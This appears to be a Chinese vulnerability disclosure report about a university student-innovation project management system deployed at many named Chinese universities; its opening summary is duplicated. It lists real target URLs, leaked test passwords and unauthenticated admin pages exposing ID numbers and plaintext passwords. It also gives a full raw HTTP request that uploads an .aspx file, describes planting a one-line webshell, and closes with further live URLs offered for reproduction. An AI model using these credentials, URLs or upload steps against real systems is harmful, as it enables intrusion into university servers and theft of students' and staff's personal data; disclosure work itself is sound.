### 简要描述: 1#操作手册泄漏测试用户及密码 2#非授权访问,可直接获取系统内所有用户关键信息 3#一枚任意文件上传漏洞 ### 详细说明: 注意与其不同 [WooYun: 某通用型创新管理系统普通帐号可越权查看及修改任意用户(影响多所高等院校)](http://www.wooyun.org/bugs/wooyun-2014-064701) 官网:http://www.changedu.com/ 由南京先极科技有限公司开发的大学生创新创业训练项目智能管理系统 关键字:大学生创新创业项目智能管理系统 影响案例: http://desktop.nju.edu.cn/cx/ 南京大学大学生创新创业训练智能管理系统 http://dxscx.forestpolice.net/ 南京森林警察学院大学生创新创业训练智能管理系统 http://180.209.64.18/cxcy/Index.aspx 南京邮电大学大学生创新创业训练智能管理系统 http://210.26.14.200/ 西北民族大学大学生创新创业训练项目智能管理系统 http://sjjx.njit.edu.cn/cx/ 南京工程学院大学生创新训练智能管理系统 http://nausrt.njau.edu.cn/ 南京农业大学大学生创新训练智能管理系统 http://202.195.237.148/dcxm/Index.aspx 南京信息工程大学生创新训练智能管理系统 http://sy.cxxy.seu.edu.cn/cx/ 东南大学成贤学院大学生创新训练智能管理系统 http://cx.njxzc.edu.cn/ 南京晓庄大学生创新训练智能管理系统 http://210.38.64.108/cx/ 广东第二师范学院大学生创新训练智能管理系统 http://cx.yctc.edu.cn/ 盐城师范学院大学生创新训练智能管理系统 http://cxsb.yzu.edu.cn/ 扬州大学大学生创新训练智能管理系统 http://cxcy.shisu.edu.cn/ 上海外国语大学大学生创新创业项目智能管理系统 http://cxcy.lzu.edu.cn/Index.aspx 兰州大学大学生创新创业项目智能管理系统 http://210.46.116.20/...
### 简要描述: 1#操作手册泄漏测试用户及密码 2#非授权访问,可直接获取系统内所有用户关键信息 3#一枚任意文件上传漏洞 ### 详细说明: 注意与其不同 [WooYun: 某通用型创新管理系统普通帐号可越权查看及修改任意用户(影响多所高等院校)](http://www.wooyun.org/bugs/wooyun-2014-064701) 官网:http://www.changedu.com/ 由南京先极科技有限公司开发的大学生创新创业训练项目智能管理系统 关键字:大学生创新创业项目智能管理系统 影响案例: http://desktop.nju.edu.cn/cx/ 南京大学大学生创新创业训练智能管理系统 http://dxscx.forestpolice.net/ 南京森林警察学院大学生创新创业训练智能管理系统 http://180.209.64.18/cxcy/Index.aspx 南京邮电大学大学生创新创业训练智能管理系统 http://210.26.14.200/ 西北民族大学大学生创新创业训练项目智能管理系统 http://sjjx.njit.edu.cn/cx/ 南京工程学院大学生创新训练智能管理系统 http://nausrt.njau.edu.cn/ 南京农业大学大学生创新训练智能管理系统 http://202.195.237.148/dcxm/Index.aspx 南京信息工程大学生创新训练智能管理系统 http://sy.cxxy.seu.edu.cn/cx/ 东南大学成贤学院大学生创新训练智能管理系统 http://cx.njxzc.edu.cn/ 南京晓庄大学生创新训练智能管理系统 http://210.38.64.108/cx/ 广东第二师范学院大学生创新训练智能管理系统 http://cx.yctc.edu.cn/ 盐城师范学院大学生创新训练智能管理系统 http://cxsb.yzu.edu.cn/ 扬州大学大学生创新训练智能管理系统 http://cxcy.shisu.edu.cn/ 上海外国语大学大学生创新创业项目智能管理系统 http://cxcy.lzu.edu.cn/Index.aspx 兰州大学大学生创新创业项目智能管理系统 http://210.46.116.20/ 哈尔滨商业大学大学生创新创业项目智能管理系统 http://jw1.jiangnan.edu.cn/dxscx/ 江南大学大学生创新创业项目智能管理系统 http://202.119.81.120/ 南京理工大学大学生创新创业项目智能管理系统 http://bylw.pk.njau.edu.cn/gxycx/ 南京农业大学大学生创新训练智能系统 等等不一一列举 ### 漏洞证明: 以西北民族大学大学生创新创业训练项目智能管理系统为例 ``` http://210.26.14.200 ``` 入侵思路:试探admin弱口令,及登录注入,无突破,想到大部分校园系统学号即密码,又懒得去找,最后发现系统有个操作手册,下载之,发现了测试帐号 1#操作手册泄漏测试用户及密码 ``` http://210.26.14.200/UpLoadFile/690476.doc ``` [<img src="https://images.seebug.org/upload/201412/271108594f61a5d65aef61b4bc6996d701b3a97a.jpg" alt="QQ截图20141227110842.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271108594f61a5d65aef61b4bc6996d701b3a97a.jpg) [<img src="https://images.seebug.org/upload/201412/271108173999addd8008abdf912aafc434ff2926.jpg" alt="QQ截图20141227110554.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271108173999addd8008abdf912aafc434ff2926.jpg) [<img src="https://images.seebug.org/upload/201412/2711101499330e9f3f76c4452a87b12299b52bfc.jpg" alt="QQ截图20141227110614.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2711101499330e9f3f76c4452a87b12299b52bfc.jpg) [<img src="https://images.seebug.org/upload/201412/27111033f096b685ba5b4070a0fa0e273e679bd0.jpg" alt="QQ截图20141227110722.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27111033f096b685ba5b4070a0fa0e273e679bd0.jpg) 测试帐号,可通用于大部分系统 s1/1 s2/1 s1/s1 s2/s2 st1/1 等等 2#未授权访问地址(有多处,无需登陆,以下仅举关键2处): 2.1# ``` http://210.26.14.200/Admin/SelStudent.aspx ``` [<img src="https://images.seebug.org/upload/201412/271056144c65f3bb3ca588074a012830f51ccf8e.jpg" alt="QQ截图20141227105038.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271056144c65f3bb3ca588074a012830f51ccf8e.jpg) [<img src="https://images.seebug.org/upload/201412/27105628b764af4b875d01d01c7d0885340f8104.jpg" alt="QQ截图20141227105313.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27105628b764af4b875d01d01c7d0885340f8104.jpg) [<img src="https://images.seebug.org/upload/201412/2710554832764098248294510cd7b55f3e4b1e0e.jpg" alt="QQ截图20141227105457.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2710554832764098248294510cd7b55f3e4b1e0e.jpg) 2.2# ``` http://210.26.14.200/Admin/SelTutor.aspx ``` [<img src="https://images.seebug.org/upload/201412/271059082fdb0d41ac831d737e15fc2edfcf6c01.jpg" alt="QQ截图20141227105746.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/271059082fdb0d41ac831d737e15fc2edfcf6c01.jpg) 可导出!部分版本显示字段可能不同,但一个系统里关键的用户数据能泄漏的都泄漏了,右键查看源代码,可获得身份证完整字段,密码即学号或教工号(部分版本密码未加密,明文存放) 3#一枚明显的任意文件上传漏洞(以s1/1登录系统) ``` http://210.26.14.200/HelperScripts//ftb.imagegallery.aspx?rif=image&cif=image ``` 上传抓包改包(上传路径可改,cookie注意替换) ``` POST http://210.26.14.200/images/Upload.axd?frame=1&rif=image&cif=image&File=ImagesData/s11542/9803 HTTP/1.1 Accept: text/* Content-Type: multipart/form-data; boundary=----------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 User-Agent: Shockwave Flash Host: 210.26.14.200 Content-Length: 431 Connection: Keep-Alive Pragma: no-cache Cookie: ASP.NET_SessionId=zowfhv4500ivgn45oqergc45; .loginAuth=1395AFF5A2701FEDFC6445C9D1BF33DE9C5306EB31C9F0DE0BFF002A94D133A5A2C02DA9AD2265D512F6E0EF7F2CF634DF41749B59E7270117ECF9BBF828A4012BC93DF101C34393501B0550E6505454 ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Filename" wooyun.aspx ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Filedata"; filename="wooyun.aspx" Content-Type: application/octet-stream wooyun test ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------Ef1KM7cH2GI3gL6ei4cH2GI3Ij5Ij5-- ``` 上传路径http://210.26.14.200/ImagesData/s11542/9803/wooyun.aspx [<img src="https://images.seebug.org/upload/201412/27120231e272610b32b4d3fe572cda8b9e2a047a.jpg" alt="QQ截图20141227120207.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27120231e272610b32b4d3fe572cda8b9e2a047a.jpg) 当然程序本身有做一些处理,无法直连上传后的一句话木马,大马上传的话,几个操作后就会timeout;经过测试发现,将一句话上传到admin目录后,可以直连,并无异常情况发生,剩下的无需多言。 上刀: [<img src="https://images.seebug.org/upload/201412/2712254966793707e7a1db34078e4662f47a47d3.jpg" alt="QQ截图20141227122209.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2712254966793707e7a1db34078e4662f47a47d3.jpg) [<img src="https://images.seebug.org/upload/201412/2712255827a8a2847de20dc8de931c227726361b.jpg" alt="QQ截图20141227122537.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2712255827a8a2847de20dc8de931c227726361b.jpg) 以下案例供复现: http://desktop.nju.edu.cn/cx/Admin/SelStudent.aspx [<img src="https://images.seebug.org/upload/201412/27122952dd61bbee270a4ee50d04b9cabe44cd0b.jpg" alt="QQ截图20141227122735.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/27122952dd61bbee270a4ee50d04b9cabe44cd0b.jpg) http://desktop.nju.edu.cn/cx/HelperScripts//ftb.imagegallery.aspx?rif=image&cif=image http://dxscx.forestpolice.net/Admin/SelStudent.aspx http://180.209.64.18/cxcy/Admin/SelStudent.aspx http://sjjx.njit.edu.cn/cx/Admin/SelStudent.aspx http://nausrt.njau.edu.cn/Admin/SelStudent.aspx http://202.195.237.148/dcxm/Admin/SelStudent.aspx http://sy.cxxy.seu.edu.cn/cx/Admin/SelStudent.aspx http://cx.njxzc.edu.cn/Admin/SelStudent.aspx http://210.38.64.108/cx/Admin/SelStudent.aspx 复制好累,案例很多,大部分系统学号即密码
